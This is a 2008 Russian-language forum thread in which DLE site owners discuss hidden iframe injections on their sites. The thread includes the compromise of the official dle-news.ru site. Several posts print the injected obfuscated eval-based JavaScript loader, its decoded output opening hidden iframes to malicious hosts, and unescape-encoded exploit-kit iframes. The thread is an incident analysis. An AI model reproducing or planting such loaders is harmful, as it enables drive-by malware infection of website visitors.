Bn-P 0 Опубликовано: 3 августа 2008 Рассказать Опубликовано: 3 августа 2008 Здравствуйте, с первого числа взламывают мой сайт, а именно везде суют код <iframe src="http://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe> Обновил движок, защиту входа в админку на максимум поставил.... всё равно ломают. Взломали фтп похоже... полностью все пароли сменил доступ к фтп по ип сделал всё равно ломают.... редактируют в основном \upload\engine\ajax\dle_ajax.js \upload\engine\ajax\menu.js шаблон\main.tpl \upload\engine\data\config.php и как то 'Рекламные материалы' которые в админке.... но я теперь один админ (всех убрал) не знаю даже как редактируют.... может подскажите? ещё нашел http://rapidshare.com/files/134584506/_index.php что это? спасибо... сайт не дам - заражу ещё.... каспер орет........ Цитата Ссылка на сообщение Поделиться на других сайтах
WMDrakon 20 Опубликовано: 3 августа 2008 Рассказать Опубликовано: 3 августа 2008 BnP, вирус в компе значит!!! Цитата Ссылка на сообщение Поделиться на других сайтах
revix.ru 0 Опубликовано: 3 августа 2008 Рассказать Опубликовано: 3 августа 2008 точно Цитата Ссылка на сообщение Поделиться на других сайтах
Bn-P 0 Опубликовано: 3 августа 2008 Рассказать Опубликовано: 3 августа 2008 Автор Цитата(WMDrakon @ 3.08.2008, 22:12) <{POST_SNAPBACK}> Цитата Ссылка на сообщение Поделиться на других сайтах
Kalini 0 Опубликовано: 3 августа 2008 Рассказать Опубликовано: 3 августа 2008 попробуй ограничить доступ к ФТП по IP Цитата Ссылка на сообщение Поделиться на других сайтах
Bn-P 0 Опубликовано: 3 августа 2008 Рассказать Опубликовано: 3 августа 2008 Автор Kalini Дата Сегодня, 22:19 попробуй ограничить доступ к ФТП по IP ограничил, толку нет... Цитата Ссылка на сообщение Поделиться на других сайтах
kosen 3 Опубликовано: 3 августа 2008 Рассказать Опубликовано: 3 августа 2008 (изменено) BnP - Обнови антивирусную базу своего антивируса. - Затем сделай глобальную проверку всего компа на вирусы... наверняка найтется какой-нить паразит... - После поменяй пароли и логин на ФТП. - отпиши хостеру на предмет логов... откуда были произведены изменения файлов - с ФТП или с хоста... хотя от них правды порой не дождаться... у них всегда все в ажуре... Изменено 3 августа 2008 пользователем kosen Цитата Ссылка на сообщение Поделиться на других сайтах
demon165 8 Опубликовано: 3 августа 2008 Рассказать Опубликовано: 3 августа 2008 Здравствуйте, с первого числа взламывают мой сайт, а именно везде суют код <iframe src="http://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe> Обновил движок, защиту входа в админку на максимум поставил.... всё равно ломают. Взломали фтп похоже... полностью все пароли сменил доступ к фтп по ип сделал всё равно ломают.... редактируют в основном \upload\engine\ajax\dle_ajax.js \upload\engine\ajax\menu.js шаблон\main.tpl \upload\engine\data\config.php и как то 'Рекламные материалы' которые в админке.... но я теперь один админ (всех убрал) не знаю даже как редактируют.... может подскажите? ещё нашел http://rapidshare.com/files/134584506/_index.php что это? спасибо... сайт не дам - заражу ещё.... каспер орет........ в этом файлике у тебя троянчег сидит Цитата Ссылка на сообщение Поделиться на других сайтах
Greeze 0 Опубликовано: 4 августа 2008 Рассказать Опубликовано: 4 августа 2008 (изменено) Взлом dle-news.ru. Подробности. http://www.nulled.ws/showthread.php?t=71436 Сорри за такую кричащую тему, да еще в такой поздний час (02.40 местного)? но если это не подмена содержимого, не правка DNS в серваке.... то... ))) Случайно решил зайти на офф.сайт и при загрузки сработал антизверь. Антизверь параноик, и увидив знакомое сочетание в домене google, я разрешил ему выполнить скрипт. Совственно сижу под оперой и ничего страшного не произошло. пока писал, решил еще раз глянуть, скрипт отработал по новой (куки потер, ИП сменил для верности) и выкинул новый фрейм, скриншот с воплями авиры смотреть здесь http://imageshost.ru/links/c95a15ef6...d96b5f4035e5ca Озадачало только появление рекламы с гугля на сайте целсофта, который поидее еще до 6 в отпуске. Открываю исходник главной страницы? гуглом и не пахнет, а вижу ЛЕВЫЙ код, сначало не поверил. <body><script language=JavaScript> function mdnbn15(p) { var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,53,1,49,52,51,14,46,10,27,0,0,0,0,0,0,24,11,60,12,44,43,5,3,15,59,36,30,5 5,58,45,29,8,38,6,26,13,19,4,7,31,0,50,0,0,0,0,41,0,48,16,20,21,28,22,2,42,54,18 , 23,17,25,62,9,37,34,61,56,47,40,35,57,39,32,33);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(198^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}mdnbn15('3n8hqQSDukEDx8ID17XsgQ8hvRK0qQS_57Muu8AM3jIEZ6hIzE0EyjI_E6hwuKMhv7tB3U0ri9KN 4fMnJIhDZSA0_xKux8IuaL8Mtq8u_Q7D_xXsNts_ZM8M4QMDu8hIAKhD7q6Nxqhu_7hIt5nra0tr00KI z AXB4XtrzLKsJ9KDt8hD77tB5Wtw76MEzMhDIkXBQkED0hMuIU7utfENhKMtBvShu68wsEXMtg8Nx7Mus W nI') </script><!-- dle-news.ru --> <script language="javascript" type="text/javascript"> <!-- var dle_root = '/'; после расшифровки получаем window.status='Done';document.write('<iframe name=47210 src="http://gate6k.info/t/?'+Math.round(Math.random()*16909)+'47210'+'" width=457 height=37 style="display:none"></iframe>') т.е. открывается фрейм по адресу http://gate6k.info/t/?_РНД_47210 причем открывается один раз - фильт по кукам + ip, если один раз у вас страница подгружалась - то выдается 404. смотрим <iframe name=1c53b80a90 src='http://sum4count.net/strong/188/?cd6f51' width=399 height=60 style='display:none;'></iframe> грузим, смотрим <html> <body> <script> document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%65%32%2E%68%74%6D%6C%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%6D%70%39%2E%68%74%6D%6C%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%2F%69%66%72%61%6D%65%3E")); </script> </body> </html> дешифруем <iframe src="e2.html" width="1" height="1"></iframe> <iframe src="mp9.html" width="1" height="1"></iframe> короче мне надоело, это явно одна из последних сязок сплоитов под распространенные браузеры. как я понял выдают страницы RNВ со сплоитами, и если вы опять на них были - идет переадресация, в моем случае при первых попытках "пройтись до конца" была на msn.com под оперой 9.52 ничего не пристает. у кого ишак - даже не думайте, FF... хз. ИТОГО. КАК и через что внесли коррективы в сайт целсофта я НЕ знаю. либо хостер, либо шаблон через админку, либо пароль через троян на фтп... всяко может быть. зыы. проверил через разные php анамайзеры, код висит, значит точно не dns Добавлено через 6 минут ВНИМАНИЕ. ТАК ЖЕ ЗАРАЖЕННЫМ оказался Украинский сайт DLE вредоносный код прописан в файле http://www.nulled.ws/redirector.php?url=ht...Fjs%2Fstyles.js ну и естественно demo.dle-news.ru по остальным раскрученным врое тихо Изменено 4 августа 2008 пользователем Greeze Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 4 августа 2008 Рассказать Опубликовано: 4 августа 2008 ну и естественно demo.dle-news.ruКасперский молчит, хотя в коде видно явно посторонне явления в виде<script language=JavaScript> function mdnbn15(p) { var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,53,1,49,52,51,14,46,10,27,0,0,0,0 ,0,0,24,11,60,12,44,43,5,3,15,59,36,30,55,58,45,29,8,38,6,26,13,19,4,7,31,0,50,0, 0,0,0,41,0,48,16,20,21,28,22,2,42,54,18,23,17,25,62,9,37,34,61,56,47,40,35,57,39, 32,33);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(198^j&255);j>>=8;d-=2}else{d=6}}}eval©;}}mdnbn15('3n8hqQSDukEDx8ID17XsgQ8hvRK0qQS_57Muu8AM3jIEZ6hIzE0EyjI_E6hwuKMhv7tB3U0ri9KN 4fMnJIhDZSA0_xKux8IuaL8Mtq8u_Q7D_xXsNts_ZM8M4QMDu8hIAKhD7q6Nxqhu_7hIt5nra0tr00KIz AXB4XtrzLKsJ9KDt8hD77tB5Wtw76MEzMhDIkXBQkED0hMuIU7utfENhKMtBvShu68wsEXMtg8Nx7MusW nI') </script><!-- dle-news.ru --> [/codebox] Цитата Ссылка на сообщение Поделиться на других сайтах
Bn-P 0 Опубликовано: 4 августа 2008 Рассказать Опубликовано: 4 августа 2008 Автор demo.dle-news.ru Можно сделать вывод что сломали движок или нет? Цитата Ссылка на сообщение Поделиться на других сайтах
Al-x 7 Опубликовано: 4 августа 2008 Рассказать Опубликовано: 4 августа 2008 Вообще штука распространённая, много народу на неё попадало на самых различных сайтах и движках. Я не думаю, что дело в движке. В прочем, целсофт вернётся и всё проверит по логам... Цитата Ссылка на сообщение Поделиться на других сайтах
ower_xz 117 Опубликовано: 4 августа 2008 Рассказать Опубликовано: 4 августа 2008 ну и естественно demo.dle-news.ruКасперский молчит, хотя в коде видно явно посторонне явления в виде<script language=JavaScript> function mdnbn15(p) { var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,53,1,49,52,51,14,46,10,27,0,0,0,0 ,0,0,24,11,60,12,44,43,5,3,15,59,36,30,55,58,45,29,8,38,6,26,13,19,4,7,31,0,50,0 , 0,0,0,41,0,48,16,20,21,28,22,2,42,54,18,23,17,25,62,9,37,34,61,56,47,40,35,57,39 , 32,33);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(198^j&255);j>>=8;d-=2}else{d=6}}}eval©;}}mdnbn15('3n8hqQSDukEDx8ID17XsgQ8hvRK0qQS_57Muu8AM3jIEZ6hIzE0EyjI_E6hwuKMhv7tB3U0ri9KN 4fMnJIhDZSA0_xKux8IuaL8Mtq8u_Q7D_xXsNts_ZM8M4QMDu8hIAKhD7q6Nxqhu_7hIt5nra0tr00KI z AXB4XtrzLKsJ9KDt8hD77tB5Wtw76MEzMhDIkXBQkED0hMuIU7utfENhKMtBvShu68wsEXMtg8Nx7Mus W nI') </script><!-- dle-news.ru --> [/codebox] Этот же код и на http://dle-news.ru/ Цитата Ссылка на сообщение Поделиться на других сайтах
Bn-P 0 Опубликовано: 4 августа 2008 Рассказать Опубликовано: 4 августа 2008 Автор Ждём целсофта... может посоветует что можно сделать Цитата Ссылка на сообщение Поделиться на других сайтах
PapaKitson 25 Опубликовано: 4 августа 2008 Рассказать Опубликовано: 4 августа 2008 вредоносный код прописан в файле http://www.nulled.ws/redirector.php?url=ht...Fjs%2Fstyles.js Там совсем другой код. Посмотрел, имхо, не заражен. Цитата Ссылка на сообщение Поделиться на других сайтах
e-al 0 Опубликовано: 4 августа 2008 Рассказать Опубликовано: 4 августа 2008 сегодня при заходе на сайт каспер орал - трояна находил в файлах кэша оперы (какой то пдфник был заражен).. я как раз собирался покупать этот скрипт, и вот теперь незнаю... ждем появления админа Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 4 августа 2008 Рассказать Опубликовано: 4 августа 2008 да, да. украинский чистый, просто авира параноик, там просто скрытая подгрузка стилей css - защита от рипа Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 4 августа 2008 Рассказать Опубликовано: 4 августа 2008 e-al, а не ты ли провокатор? там просто скрытая подгрузка стилей css - защита от рипабесполезная защита Цитата Ссылка на сообщение Поделиться на других сайтах
e-al 0 Опубликовано: 4 августа 2008 Рассказать Опубликовано: 4 августа 2008 Александр Медведев, не я ли... Цитата Ссылка на сообщение Поделиться на других сайтах
Greeze 0 Опубликовано: 4 августа 2008 Рассказать Опубликовано: 4 августа 2008 там просто скрытая подгрузка стилей css - защита от рипа ух ты ) как такое реализовать? http://4dle.ru/bugs/1147156035-nedostatoch...filtracija.html Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 4 августа 2008 Рассказать Опубликовано: 4 августа 2008 http://4dle.ru/bugs/1147156035-nedostatoch...filtracija.htmlпроще не тысячу проверок лепить, а одним регулярным выражением расставить все точки над i Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 10 августа 2008 Рассказать Опубликовано: 10 августа 2008 так, Целсофт вернулся, интересно услышать офф версию про левый код Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 10 августа 2008 Рассказать Опубликовано: 10 августа 2008 http://forum.dle-news.ru/index.php?showtopic=41488 Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.